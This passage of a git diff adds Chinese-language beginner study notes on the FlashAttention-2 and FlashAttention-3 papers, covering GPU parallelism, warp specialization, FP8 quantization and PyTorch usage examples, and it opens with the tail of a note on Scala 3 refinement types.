限定类型 | 独立 checker | SMT,更强算术 | +| Iron / Refined(库) | opaque + implicit | 完全 inside Scala | implicit 能力上限 | +| **本文 Scala 3** | **普通类型语法** | **同一 type checker** | **内置 e-graph** | +| F* / Dafny | first-class | 为验证设计的语言 | SMT / Dafny 求解器 | +| Stainless | 精化 + 依赖 | 独立验证器 | 强大 SMT,目标更重 | + +本文定位:**在已有丰富子类型的工业语言里**,把 refinement 做成 first-class,并用 modest 编译器改动 + 轻量求解器证明可行。 + +--- + +## 学习路径(零基础) + +1. **先理解 refinement 直觉**:集合 `{ x ∈ T | P(x) }`;子类型 = 谓词变强(集合变小)。 +2. **读 Liquid Haskell 一个例子**,再对照论文 Scala 语法——体会「一套 vs 两套类型系统」。 +3. **手画子类型格**:`{ v:Int | v>0 }` → `Int`;`Even` 如何放进 `U <: T`。 +4. **跟踪 equality fact**:写 `val a = m+n`,在需要 `len == m+n` 的地方求解器怎么用 `a ~ m+n`。 +5. **了解 selfification 触发点**:期望类型是 qualified type 时,表达式如何变成 `{ x:T | x==e }`。 +6. **区分静态义务 vs `.runtimeChecked`**:哪些证明是编译期,哪些是程序员承担的动态检查。 +7. **若学类型论**:读 §3 的 F<: + 精化 + 正等递归;对比 Hamza System FR 的全正确性假设。 +8. **若学编译器**:Dotty bidirectional checking 的 reconciliation 点、e-graph congruence closure(Nelson-Oppen 传统)。 + +--- + +## 局限与开放问题 + +- **求解器能力**:无完备线性算术;复杂不变量仍可能证不出,需 `.runtimeChecked` 或弱化规范。 +- **谓词纯度**:目前不传递检查被调用函数是否纯;未来或与 Scala 3 capture tracking / safe mode 集成。 +- **JVM 擦除**:参数化精化如 `List[ID]` 的模式匹配受限;需 workaround(如 `filter` + 精化元素)。 +- **高阶谓词**:运行时检查仅限一阶;高阶 contract 仍是 future work。 +- **草稿阶段**:论文写「coming months will update」;API 以最终 Scala 3 PR 为准。 + +--- + +## 一句话总结 + +**Refinement type 不是编译器外的「验证注释」,而是 Scala 3 类型语法里的普通公民**——与子类型、泛型、重载、模式匹配同一套规则;通过 equality facts 与 selfification 保持推断兼容,用内置 e-graph discharge 义务,并在 Rocq 里证明核心 soundness。对学习者而言,这篇论文的价值在于:它把「轻量形式化验证」从专用语言/插件,推到了**你已经在写的 Scala 类型**里。 + +--- + +## 参考链接 + +- 论文 HTML:[arXiv:2605.08369](https://arxiv.org/html/2605.08369v1) +- 论文 PDF:[https://arxiv.org/pdf/2605.08369](https://arxiv.org/pdf/2605.08369) +- 相关工作 PR:[scala/scala3#21586](https://github.com/scala/scala3/pull/21586) +- 历史背景:Liquid Types(Rondon et al. 2008)、Liquid Haskell(Vazou et al. 2014) +- 形式化参考:System FR(Hamza et al. 2019)、Schmid SMT-based qualified types for Scala(2016) diff --git a/src/content/docs/papers/flash-attention.md b/src/content/docs/papers/flash-attention.md index 8ff79c68c..9cd42fe0a 100644 --- a/src/content/docs/papers/flash-attention.md +++ b/src/content/docs/papers/flash-attention.md @@ -158,13 +158,17 @@ with sdpa_kernel(SDPBackend.MATH): - [[colbert-v2]] —— ColBERTv2 — 让向量检索既精又能扛百万文档 - [[cutlass-2020]] —— CUTLASS — 把 SOTA GEMM 拆成可组合的 C++ 模板层级 - [[distserve]] —— DistServe — 把 prefill 和 decode 拆到不同 GPU 上跑 +- [[ds-zero-pp-comm]] —— ZeRO++ — 巨型模型训练中的极致高效集合通信 - [[eagle]] —— EAGLE — 让大模型先在"特征层"猜下一步而不是猜 token - [[fastertransformer-2021]] —— FasterTransformer 2021 — NVIDIA 第一代开源 LLM 推理引擎 - [[fermi-architecture-2010]] —— NVIDIA Fermi — 把 GPU 从游戏卡推上超算 +- [[flashattention-2]] —— FlashAttention-2 — 更快的 Attention 与更好的并行 +- [[flashattention-3-2024]] —— FlashAttention-3 — Hopper 上的异步 Attention 与 FP8 低精度 - [[gat-2018]] —— GAT — 让图神经网络的邻居自带权重 - [[gpt-3]] —— GPT-3 — Language Models are Few-Shot Learners - [[gpu-microbenchmarking-2010]] —— GPU 微基准 — 用秒表把闭源芯片"戳"出真相 - [[http-2]] —— HTTP/2 — 把 HTTP 从文本协议改造成二进制多路复用 +- [[liger-kernel-llm-training]] —— Liger Kernel — 面向 LLM 训练的高效 Triton Kernel 套件 - [[lindholm-2008-tesla]] —— Lindholm 2008 Tesla — SM、warp、SIMT 这套词汇的官方出生证明 - [[llama]] —— LLaMA — Meta 开源大语言模型 - [[longformer-2020]] —— Longformer — 滑窗加少数全局 token,把长文档喂进 Transformer @@ -175,9 +179,11 @@ with sdpa_kernel(SDPBackend.MATH): - [[reformer-2020]] —— Reformer — 用哈希分桶把 attention 从 O(L²) 压到 O(L log L) - [[rwkv-2023]] —— RWKV — 让 RNN 拿到 Transformer 那张训练并行的入场券 - [[sarathi-serve]] —— Sarathi-Serve — 让长 prompt 不再卡住所有人的流式回复 +- [[sglang-radixattention]] —— SGLang — 结构化语言模型程序的高效执行(RadixAttention 零基础笔记) - [[sparsegpt-2023]] —— SparseGPT — 175B 大模型一次过剪 50%,不重训 - [[specinfer-2023]] —— SpecInfer — 让大模型一次"猜一棵树"再并行验证 - [[tabpfn-2023]] —— TabPFN — 一秒解决小表格分类的 Transformer +- [[tensorrt-llm-overview]] —— TensorRT-LLM — NVIDIA 开源 LLM 推理优化库零基础笔记 - [[tesla-architecture-2008]] —— NVIDIA Tesla — 把显卡改造成通用并行计算机 - [[transformer-xl-2019]] —— Transformer-XL — 让 Transformer 像 RNN 那样把上下文滚动传下去 - [[triton-2019]] —— Triton 2019 — 让 Python 写出贴近 cuBLAS 的 GPU kernel diff --git a/src/content/docs/papers/flashattention-2.md b/src/content/docs/papers/flashattention-2.md new file mode 100644 index 000000000..7376d7d7a --- /dev/null +++ b/src/content/docs/papers/flashattention-2.md @@ -0,0 +1,303 @@ +--- +title: FlashAttention-2 — 更快的 Attention 与更好的并行 +来源: https://arxiv.org/abs/2307.08691 +日期: 2026-06-13 +子分类: ML 系统 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:流水线已经省下了仓库运费,但车间排班还不对 + +FlashAttention(第一代)解决的是**仓库问题**:标准 attention 要把整张 N×N 的「谁看谁」分数表写进 HBM(显存里的慢速仓库),FlashAttention 用分块 + online softmax,**从不把整张表落盘**,显存从 O(N²) 降到 O(N),速度也涨了 2–4×。 + +但 Tri Dao 在 2023 年的 FlashAttention-2 论文里发现:**仓库运费省下来了,车间里的工人排班还是乱的**。 + +想象一条 GPU 上的**汽车装配线**: + +- **Streaming Multiprocessor(SM)** = 一条独立产线(A100 有 108 条)。 +- **Thread block** = 一个班组,负责某批零件。 +- **Warp(32 线程)** = 班组里 32 个工人,必须步调一致干活。 + +FlashAttention-1 的排班是:**每个 attention head 派一个班组**(thread block 数 ≈ batch × heads)。当 batch 很小、head 不多时,108 条产线可能只开了 8 条——**大量 SM 空转(低 occupancy)**。序列很长时,单个班组要干完一整头 attention,**内部工人还要互相传半成品(shared memory 读写)**,进一步拖慢。 + +FlashAttention-2 做了三件事: + +1. **少做「非矩阵乘」杂活**——GPU 的 Tensor Core 算矩阵乘比算 exp/除法快一个数量级,把 rescale 挪到块末尾统一做。 +2. **沿序列长度再切一刀并行**——哪怕 batch=1、head=1,长序列也能拆成多个 row block,**多条产线同时干同一头 attention**。 +3. **班组内按 Q 行切 warp,而不是按 K 列切**——每个 warp 独立算自己那几行输出,**不用在 shared memory 里开会合并**。 + +结果:在 FlashAttention 已经很快的基础上再快约 **2×**,A100 上达到理论峰值 FLOPs 的 **50–73%**,端到端 GPT 训练约 **225 TFLOPs/s(72% MFU)**——接近 cuBLAS 那种纯 GEMM 的效率。 + +--- + +## 是什么 + +**FlashAttention-2: Faster Attention with Better Parallelism and Work Partitioning**(Tri Dao,2023 年 7 月,[arXiv:2307.08691](https://arxiv.org/abs/2307.08691))是在 FlashAttention **数学完全不变**(仍是 exact attention,无近似)的前提下,重写 CUDA kernel,优化 **GPU 并行调度与工作划分**。 + +| 项目 | 内容 | +|------|------| +| 作者 | Tri Dao(Stanford,Christopher Ré 组) | +| 实现 | 基于 NVIDIA CUTLASS 3.x / CuTe 从零重写 | +| 相对 FA1 | 约 **2×** kernel 加速;A100 达峰值 FLOPs 的 50–73%(FA1 仅 25–40%) | +| 端到端 | GPT 类模型训练最高约 **225 TFLOPs/s / A100**,**72% model FLOPs utilization** | +| 开源 | [github.com/Dao-AILab/flash-attention](https://github.com/Dao-AILab/flash-attention)(v2 起默认后端) | + +与 PagedAttention([[paged-attention-vllm]])正交:PagedAttention 管 **KV cache 怎么存**;FlashAttention-2 管 **attention 矩阵怎么算**。现代 LLM 栈里两者常一起出现。 + +--- + +## 为什么重要 + +- **长上下文训练/推理的算力底座**:32k、128k context 若仍用 naive attention,算力和显存都扛不住;FA2 让「长序列 + 大 batch」在硬件上可行。 +- **PyTorch 2.x 默认路径**:`F.scaled_dot_product_attention` 在 CUDA 上优先走 FlashAttention-2/3 kernel,**不改模型代码**就吃到加速。 +- **说明「系统优化第二幕」**:FA1 证明 IO-aware 能赢;FA2 证明 **occupancy + warp 分工** 还能再榨一倍——瓶颈从 HBM 转向 SM 利用率与 kernel 融合。 +- **与 [[flash-attention]] 的关系**:先读 v1 理解 tiling / online softmax;v2 是在 v1 正确性之上做 **工程并行化**,不是新算法。 + +--- + +## 核心概念 + +### 1. 标准 attention 的两层瓶颈(复习) + +对序列长度 N、head 维度 d: + +``` +Attention(Q, K, V) = softmax(QK^T / √d) · V +``` + +- **数学复杂度**:O(N²d) FLOPs。 +- **内存**:物化 QK^T 要 O(N²) HBM(FlashAttention-1 已消除)。 +- **FA1 之后的新瓶颈**:kernel 仍慢,因为 GPU **SM 没喂饱**、**非 matmul 指令占比高**、**warp 间 shared memory 通信多**。 + +### 2. 减少 non-matmul FLOPs + +A100 上 Tensor Core 做 bf16/fp16 矩阵乘,吞吐远高于 CUDA core 上的 exp、max、除法。 + +FlashAttention-2 调整 **online softmax 的 rescaling 时机**:在每个 K/V tile 累加时少做几次标量 rescale,**在 tile 边界统一归一化**,让更多时间花在 `QK^T` 和 `PV` 这类 GEMM 上。 + +直觉:**尽量让 Tensor Core 一直转,别让几个 CPU 式标量运算把流水线卡住。** + +### 3. 序列维度并行(2D tiling) + +FlashAttention-1 的 thread block 网格大致是: + +``` +grid ≈ (batch_size × num_heads) +``` + +当 `batch × heads < SM 数量`(例如推理 batch=1、模型 head=32,A100 有 108 SM)时,**大量 SM 闲置**。 + +FlashAttention-2 把 Q 的行再切成 `T_r = ⌈N / B_r⌉` 个 **row block**,每个 `(batch, head, row_block)` 启动一个 thread block: + +``` +grid ≈ (batch_size × num_heads × T_r) +``` + +长序列(N 大)时,即使 batch 和 head 都小,也能 **用满 GPU**。反向传播类似地沿 K/V 的列块切分。 + +### 4. Warp 级工作划分:split-Q 取代 split-K + +在一个 thread block 内部,FA1 曾把 **K 的列** 分给不同 warp(split-K):warp 0 算 K 的前几列、warp 1 算后几列……最后 partial output 要在 **shared memory 里 reduce**,跨 warp 读写频繁。 + +FA2 改为 **split-Q**: + +- 每个 warp 负责 **Q 的不同行子集**(输出行的不同 slice)。 +- K、V 的 tile **所有 warp 共享读取**。 +- 各 warp 独立算完自己的输出 slice,**无需 warp 间归约**。 + +类比:以前 4 个工人各切菜的不同部位,最后还要把半成品倒进同一个盆搅拌;现在每人负责一道完整的小份菜,**各做各的,互不打扰**。 + +### 5. 性能数字怎么读 + +| 指标 | FA1(约) | FA2(约) | 含义 | +|------|-----------|-----------|------| +| 峰值 FLOPs 利用率 | 25–40% | 50–73% | 离 A100 312 TFLOPs/s 理论峰值有多近 | +| 相对 FA1 加速 | 1× | ~2× | 同硬件、同精度、同 N | +| 端到端 GPT 训练 | — | ~225 TFLOPs/s | 含 embedding、MLP、通信等全模型 | +| MFU | — | ~72% | Model FLOPs Utilization,业界常用训练效率指标 | + +「接近 GEMM 效率」的含义:attention 这种带 softmax 的非纯 matmul 算子,终于能和 cuBLAS 矩阵乘 **处在同一数量级** 的硬件利用率。 + +--- + +## 代码示例 + +### 示例 1:PyTorch 里显式选用 FlashAttention-2 后端 + +PyTorch 2.0+ 的 SDPA 会自动选最快 backend;下面演示如何 **强制对比** math(朴素)与 flash: + +```python +import torch +import torch.nn.functional as F +from torch.nn.attention import SDPBackend, sdpa_kernel + +# shape: [batch, num_heads, seq_len, head_dim] +B, H, N, D = 2, 32, 8192, 128 +q = torch.randn(B, H, N, D, device="cuda", dtype=torch.bfloat16) +k = torch.randn(B, H, N, D, device="cuda", dtype=torch.bfloat16) +v = torch.randn(B, H, N, D, device="cuda", dtype=torch.bfloat16) + +# FlashAttention-2(PyTorch 内部调用 flash_attn CUDA kernel) +with sdpa_kernel(SDPBackend.FLASH_ATTENTION): + out_flash = F.scaled_dot_product_attention( + q, k, v, is_causal=True, scale=1.0 / (D ** 0.5) + ) + +# 朴素实现:会物化 N×N,长序列 OOM 或极慢 +with sdpa_kernel(SDPBackend.MATH): + out_math = F.scaled_dot_product_attention( + q, k, v, is_causal=True, scale=1.0 / (D ** 0.5) + ) + +# exact attention:数值应一致(允许 bf16 微小误差) +torch.testing.assert_close(out_flash, out_math, rtol=1e-2, atol=1e-2) +``` + +长序列(N=8192)+ causal 时,`MATH` 往往 **显存爆炸或慢一个数量级**;`FLASH_ATTENTION` 走 FA2 分块路径,**显存 O(N)**、吞吐接近 GEMM。 + +### 示例 2:直接用 flash-attn 包(训练栈常见写法) + +HuggingFace / LLaMA 训练脚本里更常显式依赖 `flash_attn`: + +```python +# pip install flash-attn --no-build-isolation +from flash_attn import flash_attn_func + +# 输入 layout 与 SDPA 不同:[batch, seq, heads, dim] +x = torch.randn(2, 4096, 32, 128, device="cuda", dtype=torch.bfloat16) +q = k = v = x # 自注意力示意 + +# causal=True 启用 GPT 式下三角 mask;softmax_scale 默认 1/sqrt(d) +out = flash_attn_func(q, k, v, causal=True, softmax_scale=None) + +# out.shape == (2, 4096, 32, 128) +# backward 同样走 FA2 kernel,不存 N×N attention matrix +loss = out.sum() +loss.backward() +``` + +`flash_attn_func` 的 v2 实现即论文中的 **split-Q + 序列并行** kernel;与 `torch.compile`、FSDP 等组合时,注意 **head_dim** 仅支持常见值(64、128 等),非 8 倍数可能 fallback。 + +### 示例 3(伪代码):online softmax 与 FA2 的 rescale 优化 + +理解 FA2「少做 non-matmul」可对照下面 **分块流式 softmax**(与 [[flash-attention]] 中 `(m, l)` 记号一致): + +```python +import math + +def online_softmax_blocks(scores_blocks): + """scores_blocks: 把一行 N 个 logits 切成多块,模拟 FA tiling。""" + m = float("-inf") # 当前最大值 + l = 0.0 # 当前 exp 之和(未归一化) + acc = None # 加权 V 的分子累加(示意) + + for block in scores_blocks: + m_new = max(m, max(block)) + # FA2:尽量把 rescale 合并到块边界,减少块内多次标量除法 + scale_old = math.exp(m - m_new) if m > float("-inf") else 0.0 + l = l * scale_old + sum(math.exp(x - m_new) for x in block) + m = m_new + # ... 同步更新 acc(PV 的在线累加)... + + return [math.exp(x - m) / l for block in scores_blocks for x in block] +``` + +标准实现每来一块就可能对 **已有累加结果** 做一次 rescale;FA2 在 CUDA 里 **合并 rescale 次数**,让 warp 更多周期花在 `mma.sync`(矩阵乘)上。 + +--- + +## FlashAttention-1 vs FlashAttention-2 对照 + +| 维度 | FlashAttention-1 | FlashAttention-2 | +|------|------------------|------------------| +| 核心创新 | IO-aware tiling + online softmax | 更好的并行与工作划分 | +| Thread block 并行轴 | batch × heads | batch × heads × **seq row blocks** | +| Warp 策略 | split-K,需 shared memory reduce | **split-Q**,warp 独立 | +| non-matmul 占比 | 较高 | **降低**(rescale 合并) | +| A100 峰值利用率 | ~25–40% | **~50–73%** | +| 实现基础 | 手写 CUDA | **CUTLASS 3 / CuTe 重写** | + +数学输出:**bit-exact(在浮点语义下与 naive attention 一致)**,不是近似 attention。 + +--- + +## 踩过的坑 + +1. **head_dim 与硬件对齐**:FA2 kernel 对 d=64、128 等优化最充分;奇异的 head_dim 可能无法 dispatch,静默 fallback 到慢路径。 +2. **短序列不划算**:N 很小时,额外 thread block 与 tiling 开销 > 收益;seq_len < 512 可能不如朴素 kernel。 +3. **与 dropout / 自定义 bias**:训练时 attention dropout 需在 kernel 内支持;自定义 alibi / sliding window 要查 `flash_attn` 版本是否实现。 +4. **多卡训练 MFU 仍受通信限制**:单卡 225 TFLOPs/s 是 kernel 胜利;全集群 MFU 还被 ZeRO、梯度 all-reduce 拉低——**别用单卡 micro-benchmark 直接外推集群效率**。 +5. **FA3 已针对 H100**:Hopper 上 FlashAttention-3 用 WGMMA 异步再提速;A100 上 FA2 仍是主力。 + +--- + +## 适用 vs 不适用 + +**适用**: + +- 长序列 self-attention / causal LM 训练与推理 +- 需要 **exact attention**、不能接受 Performer / Linformer 近似 +- A100 / RTX 40 系 / H100(配合 FA3)等 NVIDIA GPU +- 与 PyTorch SDPA、HuggingFace、`flash_attn` 生态集成 + +**不适用**: + +- CPU / Apple Silicon 无 CUDA kernel(用 MPS 或 CPU SDPA) +- 极端稀疏 attention pattern(需 block-sparse 专用 kernel) +- 要改 attention 公式本身(如新增可学习 bias 矩阵)——需自写 Triton/CUDA(可参考 [[triton-llm]]) + +--- + +## 与相关工作的位置 + +```text +Attention 太慢 / 太占显存 + ├── 改算法(近似): Performer, Linformer, [[mamba]] … + └── 不改算法(系统): + FlashAttention-1 → IO-aware,O(N) 显存 + FlashAttention-2 → 并行 + warp 划分,~2× 更快 ← 本篇 + FlashAttention-3 → Hopper 异步 + FP8 + PagedAttention → KV cache 分页([[paged-attention-vllm]]) +``` + +--- + +## 历史小故事(可跳过) + +- **2022**:FlashAttention-1 在 NeurIPS 2022 亮相,Industry 几乎立刻 adopt。 +- **2023 年 7 月**:Tri Dao 单人(相对 v1 合作者更少)发布 FA2 论文;同月/blog 宣布 **CUTLASS 3 完全重写**。 +- **2023 下半年**:PyTorch 2.1+ 将 flash 后端默认化;LLaMA 2、Mistral 等训练栈默认 `flash_attn`。 +- **2024**:FlashAttention-3 瞄准 H100;FA2 仍是 Ampere/Ada 世代事实标准。 + +Tri Dao 的轨迹说明:**PhD 期间把一个问题(attention 效率)连续挖三代**,每一代都是同一数学、不同系统层——这是 MLSys 研究的典型成功路径。 + +--- + +## 学到什么 + +1. **第一层优化解决「能不能跑」**(FA1:显存);**第二层解决「跑满 GPU」**(FA2:occupancy + matmul 占比)。 +2. **并行维度要匹配硬件规模**:108 SM 的机器上,并行度只有 8 就会浪费 90% 算力——**序列长度也是并行轴**。 +3. **shared memory 是隐形杀手**:warp 间 reduce 看起来便宜,在 attention 这种重复 K/V 读取的结构里会被放大;**改数据归属(split-Q)** 往往比改算法更有效。 +4. **读 roofline**:先判断 memory-bound 还是 compute-bound;FA1 针对前者,FA2 在 memory 问题解决后针对 **compute 利用率**。 + +--- + +## 延伸阅读 + +- 论文:[arXiv:2307.08691](https://arxiv.org/abs/2307.08691) +- 作者博客:[Princeton NLP — FlashAttention-2](https://princeton-nlp.github.io/flash-atttention-2/)(含 warp 划分示意图) +- 代码:[Dao-AILab/flash-attention](https://github.com/Dao-AILab/flash-attention) +- 前置笔记:[[flash-attention]](v1:tiling 与 online softmax) +- 推理侧互补:[[paged-attention-vllm]](KV cache 分页) +- 基础:[[attention]](Transformer 原始定义) + +## 关联 + +- [[flash-attention]] —— FlashAttention 第一代,IO-aware exact attention +- [[attention]] —— FlashAttention-2 优化的核心算子 +- [[paged-attention-vllm]] —— 推理显存管理,与 FA2 正交互补 +- [[cutlass-2020]] —— FA2 基于 CUTLASS 3.x / CuTe 重写 kernel +- [[triton-llm]] —— 若需自定义 attention variant,Triton 是常见第二选择 +- [[gpt-3]] / [[llama]] —— 大模型训练依赖 FlashAttention 系列扛长序列 +- [[mamba]] —— 「换算法降复杂度」路线,与「精确 attention + 系统优化」路线对照 diff --git a/src/content/docs/papers/flashattention-3-2024.md b/src/content/docs/papers/flashattention-3-2024.md new file mode 100644 index 000000000..d56cecff6 --- /dev/null +++ b/src/content/docs/papers/flashattention-3-2024.md @@ -0,0 +1,365 @@ +--- +title: FlashAttention-3 — Hopper 上的异步 Attention 与 FP8 低精度 +来源: https://arxiv.org/abs/2407.08608 +日期: 2026-06-13 +子分类: ml +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:厨房升级了,但厨师还在按旧菜谱干活 + +FlashAttention-2 已经把 attention 这条「产线」排班优化到 A100 上能跑满 **50–73%** 峰值算力——相当于一家工厂把仓库运费(HBM 读写)省下来,又让 108 条流水线尽量都有人干活。 + +但 2024 年 NVIDIA 推出的 **Hopper(H100)** 不是「更快的 A100」,而是换了一整套厨房设备: + +- **新灶台(WGMMA)**:矩阵乘吞吐比 Ampere 的 `mma.sync` 高一大截,但必须用新指令才能吃满。 +- **自动传菜机器人(TMA)**:专门负责把食材从冷库(HBM)搬到操作台(shared memory),厨师不用自己算地址、搬货。 +- **半份调料盒(FP8)**:同样的灶台,用 8 位浮点能再快一倍,但精度更脆,大数一多就糊。 + +FlashAttention-2 移植到 H100 上,论文测得 **只有约 35% 理论峰值 FLOPs**——就像换了智能厨房,厨师仍按旧流程:**算矩阵时等 softmax,搬数据时等矩阵**,新设备大量时间在空转。 + +**FlashAttention-3**(Tri Dao 等,2024 年 7 月,NeurIPS 2024)针对 Hopper 做了三件事: + +1. **Warp specialization**:一部分 warp 专门 TMA 搬数据(producer),另一部分专门 WGMMA 算矩阵(consumer),**计算与搬运重叠**。 +2. **GEMM 与 softmax 交错(ping-pong / pipeline)**:Tensor Core 算 `QK^T` 和 `PV` 时,多功能单元同时算 `exp`——softmax 不再挡在矩阵乘后面排队。 +3. **块量化 + incoherent processing**:FP8 矩阵乘走硬件快路径,用 **分块 scale** 和 **Hadamard 正交变换** 把 outlier「摊平」,数值误差比朴素 FP8 attention **低 2.6×**。 + +结果:H100 SXM5 上 FP16/BF16 前向 **740 TFLOPs/s(约 75% 利用率)**,比 FA2 快 **1.5–2.0×**;FP8 接近 **1.2 PFLOPs/s**,且仍是 **exact attention**(在选定精度语义下与参考实现一致,不是稀疏/线性近似)。 + +--- + +## 是什么 + +**FlashAttention-3: Fast and Accurate Attention with Asynchrony and Low-Precision**([arXiv:2407.08608](https://arxiv.org/abs/2407.08608))是 FlashAttention 系列第三代:**数学仍是标准 scaled dot-product attention**,变化在 **Hopper 专用 CUDA kernel** 与 **FP8 数值路径**。 + +| 项目 | 内容 | +|------|------| +| 作者 | Tri Dao, Jay Shah, Beidi Chen, Varun B. Thakkar(Stanford / Meta / Together AI 等) | +| 目标硬件 | **NVIDIA Hopper(H100/H800)**,依赖 WGMMA、TMA、FP8 Tensor Core | +| 相对 FA2 | FP16 前向 **1.5–2.0×**;反向 **1.5–1.75×**;H100 峰值利用率 **35% → 75%** | +| FP8 | 近 **1.2 PFLOPs/s**;配合 block quant + incoherent processing,误差优于 per-tensor FP8 baseline **2.6×** | +| 实现 | CUTLASS / CuTe;开源 [Dao-AILab/flash-attention](https://github.com/Dao-AILab/flash-attention)(Hopper 分支) | + +与 [[flashattention-2]] 的关系:FA2 解决 **Ampere 上并行与 matmul 占比**;FA3 解决 **Hopper 上异步硬件 + 低精度**——不是换 attention 公式,是换「怎么喂饱 H100」。 + +--- + +## 为什么重要 + +- **长上下文 LLM 的算力天花板**:attention 仍是 Transformer 训练/推理的主瓶颈;H100 集群若仍跑 FA2,相当于 **浪费一半 Tensor Core**。 +- **FP8 训练/推理的可信路径**:业界想用 FP8 换吞吐,但 outlier 导致量化崩;FA3 证明 **系统层数值处理**(块量化 + Hadamard)可以和 **kernel 融合** 一起交付。 +- **硬件协同设计的范本**:WGMMA/TMA 异步指令不是「编译器自动就能用好」——需要 **warp 分工、双缓冲、ping-pong 调度** 才榨出 75% 利用率。 +- **与推理栈互补**:[[paged-attention-vllm]] 管 KV 怎么存;FA3 管 attention 怎么在 Hopper 上算——vLLM、PyTorch SDPA 等栈可叠加使用。 + +--- + +## 核心概念 + +### 1. 标准 attention 在 H100 上的新瓶颈(复习) + +``` +Attention(Q, K, V) = softmax(QK^T / √d) · V +``` + +FlashAttention-1/2 已消除 **O(N²) HBM 中间矩阵**。到了 H100,瓶颈变成: + +| 环节 | 问题 | +|------|------| +| 指令代际 | 仍用 `mma.sync` 只能吃到 Hopper Tensor Core 约 **2/3** 峰值 | +| 异构单元 | H100 FP16 matmul ~**989 TFLOPs/s**,special function(`exp`)仅 ~**3.9 TFLOPs/s**——差 **256×** | +| head_dim=128 时 | matmul FLOPs 约为 exp 的 512×,但 exp 仍可能占 **~50% 墙钟时间** | +| FP8 | matmul 再快一倍,exp 速度不变 → **softmax 更「拖后腿」** | + +结论:**必须 overlap**——矩阵乘和 softmax 要并行,而不是串行。 + +### 2. Hopper 三件套:WGMMA、TMA、FP8 + +**WGMMA(Warpgroup Matrix Multiply-Accumulate)** + +- 以 **warpgroup**(通常 4 个 warp = 128 线程)为单位发起大块 GEMM。 +- 异步:发起后可继续做别的事,结果稍后通过 barrier / 异步拷贝取回。 + +**TMA(Tensor Memory Accelerator)** + +- 硬件单元负责 **global memory ↔ shared memory** 的 tile 搬运(含边界处理)。 +- 释放寄存器,让 tile 更大、流水线更深;常与 **producer warp** 绑定。 + +**FP8 Tensor Core** + +- E4M3 / E5M2 等格式,H100 上 FP8 matmul 峰值约为 FP16 **2×**。 +- WGMMA 对 **operand layout** 有严格要求;FA3 在 kernel 内做 **layout 转换 / transpose** 以对接 FP8 GEMM。 + +### 3. 异步策略一:Warp specialization(生产者–消费者) + +类比 **寿司店**: + +- **师傅 A(producer warp)**:只用 TMA 从冷库取鱼生(Q/K/V tile)放到案板(shared memory)。 +- **师傅 B(consumer warp)**:只用 WGMMA 在案板上卷寿司(GEMM),不负责跑腿。 + +两者通过 **环形缓冲区(circular buffer)** 和 **mbarrier** 同步:案板上有空位就搬下一盘,有料就卷下一批。**搬运与计算重叠**,避免「师傅卷完干等进货」。 + +FA2 里 warp 既搬又算,寄存器压力大;FA3 分工后 **TMA 与 WGMMA 流水线化**,仅换用 Hopper 指令就能从 ~350 TFLOPs/s(FA2 on H100)提到 ~**540–570 TFLOPs/s**。 + +### 4. 异步策略二:GEMM 与 softmax 交错 + +Attention 每个 K/V block 大致做: + +``` +S = Q K^T # GEMM0 +P = softmax(S) # exp + reduce(慢) +O += P V # GEMM1 +``` + +**Inter-warpgroup ping-pong**:两个 warpgroup 交替——WG1 做 GEMM 时,WG2 做上一块的 softmax,反之亦然。论文中 head_dim=128、seq=8K:~570 → ~**620 TFLOPs/s**。 + +**Intra-warpgroup pipeline**:同一 warpgroup 内,GEMM 累加器还在算时,先对 **已就绪的 score 子块** 启动 exp。~620 → ~**640–660 TFLOPs/s**,代价是 **更高寄存器压力**(同时握 GEMM accumulator 与 softmax 临时量)。 + +### 5. 低精度:块量化 + incoherent processing + +**问题**:LLM 激活常有 **outlier**(极少数元素模长远大于其余),整 tensor 一个 scale 的 FP8 量化误差很大。 + +**块量化(block quantization)** + +- 对每个 tile / block 单独算 scale(如 per-block max),再 cast 到 FP8。 +- GEMM 在 FP8 Tensor Core 上算,**累加器仍用 FP32**(与 FA 系列 online softmax 一致)。 + +**Incoherent processing**(来自 QuIP / QuIP# 等量化文献) + +- 对 Q、K 左乘 **随机正交矩阵** H(实现上用 **带随机符号的 Hadamard 变换**,O(d log d))。 +- 效果:outlier 能量被 **扩散** 到更多维度,块量化误差下降。 +- 注意力分数满足 `(QH)(KH)^T = QK^T` 当 H 正交——**不改变 exact attention 结果**(在浮点语义下)。 +- Hadamard 是 memory-bound,可与 **RoPE 等同样 memory-bound 的操作融合**,额外开销很小。 + +论文在 0.1% 元素人为放大模拟 outlier 时,FA3 FP8 比 **per-tensor FP8 baseline 误差低 2.6×**。 + +### 6. 性能数字怎么读 + +| 指标 | FA2 @ H100(约) | FA3 @ H100(约) | +|------|------------------|------------------| +| FP16 前向峰值 | ~350 TFLOPs/s(~35%) | **~740 TFLOPs/s(~75%)** | +| FP16 相对加速 | 1× | **1.5–2.0×** | +| FP8 前向 | — | **~1.2 PFLOPs/s** | +| vs cuDNN 9 | — | 长序列 FP16 **更快**;FP8 多数场景 **持平或更快**(因果 mask + 大 head_dim 有 trade-off) | +| 数值 | FA2 同级 | FP16 与 FA2 同级;FP8 显著优于 naive FP8 attention | + +NeurIPS 正式版摘要写 BF16 最高 **840 TFLOPs/s(85%)**、FP8 **1.3 PFLOPs/s**——与 blog 数字同属不同 benchmark 配置,趋势一致:**Hopper 利用率从三分之一拉到四分之三**。 + +--- + +## 代码示例 + +### 示例 1:检测 GPU 代数并选用 FlashAttention-3(Hopper) + +FA3 kernel **仅 Hopper(sm_90)** 有完整路径;Ampere 仍用 FA2。下面演示如何在 PyTorch 里 **按架构选 backend**: + +```python +import torch +import torch.nn.functional as F +from torch.nn.attention import SDPBackend, sdpa_kernel + +def hopper_flash_sdpa(q, k, v, *, causal=True): + """q,k,v: [B, H, N, D] on CUDA.""" + major, _ = torch.cuda.get_device_capability() + if major < 9: + backend = SDPBackend.FLASH_ATTENTION # FA2 on Ampere/Ada + else: + # PyTorch 2.4+ / nightly:Hopper 上 SDPA 可 dispatch FA3 + backend = SDPBackend.FLASH_ATTENTION + + scale = q.shape[-1] ** -0.5 + with sdpa_kernel(backend): + return F.scaled_dot_product_attention( + q, k, v, is_causal=causal, scale=scale + ) + +B, H, N, D = 1, 32, 16384, 128 +q = torch.randn(B, H, N, D, device="cuda", dtype=torch.bfloat16) +k = torch.randn(B, H, N, D, device="cuda", dtype=torch.bfloat16) +v = torch.randn(B, H, N, D, device="cuda", dtype=torch.bfloat16) + +out = hopper_flash_sdpa(q, k, v) +assert out.shape == (B, H, N, D) +``` + +长序列(N=16K)+ causal 